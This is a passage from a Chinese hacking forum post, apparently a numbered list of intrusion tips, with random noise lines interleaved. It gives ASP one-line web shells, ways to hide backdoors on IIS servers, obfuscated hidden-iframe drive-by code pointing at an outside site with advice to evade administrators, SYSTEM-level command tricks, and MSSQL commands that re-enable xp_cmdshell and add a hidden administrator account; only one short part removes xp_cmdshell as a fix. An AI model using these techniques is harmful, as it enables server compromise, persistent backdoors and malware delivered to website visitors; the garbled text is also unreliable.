2 Y' u' ], P1 \$ m" t( @: y
d).<script language=VBScript runat=server>execute request("sb")</Script>
, b8 r6 \6 z7 H0 l( q
e).<%25Execute(request("l"))%25>
3 H2 c) [# F! A
f).<%if request("cmd")<>"" then execute request("pass")%>
, q. i5 Y/ n/ u1 `
+ t. R |: B& y% d0 A& ~ r+ m
52、at "12:17" /interactive cmd
5 u2 X5 j2 g/ j& Q
执行后可以用AT命令查看新加的任务
- T( X* J& T9 s; x! N2 j0 D
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
/ t# R; W8 X6 t6 g
# Q. O# H* W, n, ?2 Y
53、隐藏ASP后门的两种方法
5 n7 X8 r: e- S3 b7 q' v& d
1、建立非标准目录:mkdir images..\
$ Z8 d" l5 ]! p/ a, p
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# S# o: {1 _: w
通过web访问ASP木马:http://ip/images../news.asp?action=login
9 `7 u. C% }, x5 y y; G5 g
如何删除非标准目录:rmdir images..\ /s
! @/ G, m& J* v' ]9 [
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
; x, g1 k& N% d9 p9 t# c
mkdir programme.asp
- ]" d% }, ~4 Y+ q" i5 R% f/ m2 I/ ~6 ^
新建1.txt文件内容:<!--#include file=”12.jpg”-->
% s3 U# f! ^0 R+ F. Y3 R2 H
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* B+ a/ a: s A% h
attrib +H +S programme.asp
P: _" V& {, S2 c ?6 `" N" X% m
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
' a2 ~+ A% s" W H7 D, V
9 d% e7 @# J6 Q: D$ j, r
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
7 V3 }9 @, R" G; Y) F0 j/ k; Y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
1 A: b( {: X6 m- e! K) |
! Y- J% H& X- U5 l a& M
55、JS隐蔽挂马
. o& b4 I# ~7 I$ {6 u9 N% ?/ H
1.
# e6 s! K6 a% q5 }- k
var tr4c3="<iframe src=ht";
+ s6 [1 `: B; Q4 |
tr4c3 = tr4c3+"tp:/";
- R/ [+ u- k3 [' e% j$ d' Y3 |
tr4c3 = tr4c3+"/ww";
2 a5 ~- e. {2 m6 L5 s
tr4c3 = tr4c3+"w.tr4";
5 ~: |9 F1 c- j* F1 y" D& k
tr4c3 = tr4c3+"c3.com/inc/m";
+ n$ ^2 [' C; n4 h9 h
tr4c3 = tr4c3+"m.htm style="display:none"></i";
2 q* k- A6 v" p w r; |6 x$ v. V5 `
tr4c3 =tr4c3+"frame>'";
+ p/ [7 C" T2 M5 G. ^
document.write(tr4c3);
$ l1 L/ P$ V, T7 _% |2 b
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
( V5 Y5 M* e v# Q
- X. x' i& k9 S C* y/ n
2.
& D; V: Z ^- N4 U
转换进制,然后用EVAL执行。如
7 B4 T% K% ^$ c a/ K( \5 u/ g5 B
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
8 z" E$ Z r6 F5 m
不过这个有点显眼。
( U5 i% l' G1 H5 [& E2 ^
3.
+ k2 N: a' T: l6 Q) z0 O
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
. ]3 s' h" R, e: c
最后一点,别忘了把文件的时间也修改下。
+ I; n6 _) S. |2 @8 U7 \/ L
5 |+ N& U& v* F2 t3 b1 l
56.3389终端入侵常用DOS命令
7 {# f9 P. y5 R3 M& A: K
taskkill taskkill /PID 1248 /t
9 u% @: u. M" ? f$ Z8 v- J- f+ S
1 b7 o- G/ S% ~" I" [
tasklist 查进程
5 T& _6 V1 v1 O. L4 X1 ?" z3 [
0 X4 m" R; V, K
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
* y8 {/ C( @9 @1 }: c2 V9 P
iisreset /reboot
* @# [& t7 @; w. y8 w, b) p4 Z5 R
tsshutdn /reboot /delay:1 重起服务器
( s5 M+ y) d& e
' u* j5 T$ }4 ]4 n# ^2 b% g
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
, W; o( u1 F+ q8 ~
5 Q/ W2 v& F' q8 I* R: @% W- b
query user 查看当前终端用户在线情况
/ X j3 R! g6 J0 w0 J# C5 |
2 D$ g" U+ W8 B" n, d
要显示有关所有会话使用的进程的信息,请键入:query process *
7 T' o0 s( l0 I/ C2 A
2 s& i" ~: k/ m
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
% r* o6 T" k' v8 O- s$ I* ]. r
0 q7 ?) |4 R5 H& ] ]# w+ B, M
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! `( j. Q! s% q5 E
- `7 f! q( Y' K
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
5 S1 w1 h% F8 O* w, s$ W/ M
. X4 i& [+ y' D7 T4 Z6 q! P2 }* Y
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 T7 k4 L& h8 h" L# o. b) u/ ?
! m. ^* N2 j' p3 u
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
% A* z% `& i. ?( d7 |, f# n F
' f# t+ v' _- F
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 `+ g- F: A, Z) I- D- P1 k3 N
$ _. H% u8 s- A3 F! w, r( e
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
% |" U9 T* k$ _$ O$ i4 c g
) a( f4 ], F& Z3 b4 f4 q1 o* h
56、在地址栏或按Ctrl+O,输入:
; u" w& z% r$ s
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) {3 F- q" I( s3 J$ i; l9 E
$ g2 n/ w: |" u4 K! T* T
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% \- h+ A5 m7 `( E9 C
% r0 p& H6 R2 ~; Q! L% o, U3 u
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 w! b9 J4 K! p
用net localgroup administrators是可以看到管理组下,加了$的用户的。
. o! y, X0 y! t6 u, d% X! R( p
6 A8 m" w7 b5 ^, l4 ?5 Y
58、 sa弱口令相关命令
* J% u- N4 e% z* O) n
7 L9 t1 L" W, y. D4 ]* o
一.更改sa口令方法:
( L3 ~8 Y6 { G/ q- { M$ g
用sql综合利用工具连接后,执行命令:
7 y) h$ Q6 p7 r
exec sp_password NULL,'20001001','sa'
+ d7 a& M6 }! D7 z
(提示:慎用!)
& o. p/ ], z6 \5 m& _
" S3 p/ @8 T4 C0 I- Y& S3 r( ]5 n8 |5 _
二.简单修补sa弱口令.
( u3 n7 U7 U& V; m
5 d/ n4 O6 V* D4 A6 q6 r' ?1 @
方法1:查询分离器连接后执行:
' y A ?: T! E. h3 i7 v# ?
if exists (select * from
5 A, D% D1 P+ N; G" F: y/ t
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 s( m3 G* j) \* _$ t) m
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 R1 D+ x& e- w( w3 f+ @
. h/ N' J6 y x& |& V- d. u% X
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' Y3 I" _+ k. U' k- G
0 |- Q: b' e, @ h
GO
$ C2 z9 Q* o/ }
" M. D. ^: s0 D! i% W
然后按F5键命令执行完毕
" j) a( {1 T$ o
( { Y- U3 }: b) e6 t- h
方法2:查询分离器连接后
- u6 K& U' _5 h9 Q0 n* Q
第一步执行:use master
5 V8 o$ _) s3 h( {* d0 v# T
第二步执行:sp_dropextendedproc 'xp_cmdshell'
+ v6 L1 s6 G1 d( X; s
然后按F5键命令执行完毕
+ O( f7 y! Z3 J+ n
! N% m! V: m) f& `+ s$ q/ `- @' d9 A
9 j' S% ^3 P8 J: f9 s* P
三.常见情况恢复执行xp_cmdshell.
( z! @3 ^. p; A! B% V( @ H9 h
. n# @8 u+ ]' z9 K
. H9 P1 V( R* j. {
1 未能找到存储过程'master..xpcmdshell'.
5 d; J% t+ H8 v* d/ F' ?2 s
恢复方法:查询分离器连接后,
' B; G$ D% F1 e0 L# [
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ [$ W+ V/ D+ v5 Q# z o1 _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& n1 d1 w! \& p" R3 G8 W; A
然后按F5键命令执行完毕
3 x' V( Q$ A! g' n" I }
- O( m; a9 h) J' E! ~2 k! i* g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# M, J4 _: e" X# d( F m V
恢复方法:查询分离器连接后,
% r% f; h' q; w1 C) a$ O. N
第一步执行:sp_dropextendedproc "xp_cmdshell"
/ q* Y2 O- ?/ p2 N, F
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! b5 I! d8 R8 Y) i
然后按F5键命令执行完毕
% a* |8 |; O1 O1 O* `
) c& O) T- f6 F
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. l. R5 [, H9 |- U2 ?" c
恢复方法:查询分离器连接后,
" p- c/ x9 y6 s3 g
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 j+ k3 o; W! L( p, N8 G! o: }* J9 z
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! C9 }1 K) d+ \& n+ ?6 j: [# y
然后按F5键命令执行完毕
! e0 w: g& \+ t# {/ Z0 h4 s
9 r0 l4 U& E. h5 J, R# ^ `
四.终极方法.
3 o+ C$ b% y* {3 {9 b& h
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
$ \8 f& x! p. u( W+ e
查询分离器连接后,
0 m9 g" Y' K# D/ |! P4 p% W0 o: f, J9 p
2000servser系统:
, A" G7 w) F" ~# l3 S) y* r% i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ { E7 E# v! \6 O3 i m2 F
0 e, ]7 e3 O F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 S: p, P, S$ b
3 \% C& u: O7 Z9 R0 O
xp或2003server系统:
. ~1 D* ?; }+ Y5 N& h* H' |, V
n* A" S5 A" u% ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
- e5 a; `; X' z& U' A
6 o. K# w# O$ F) k( G: i/ k4 R; T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) ~! ]% c. C' V9 p- p. ~
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2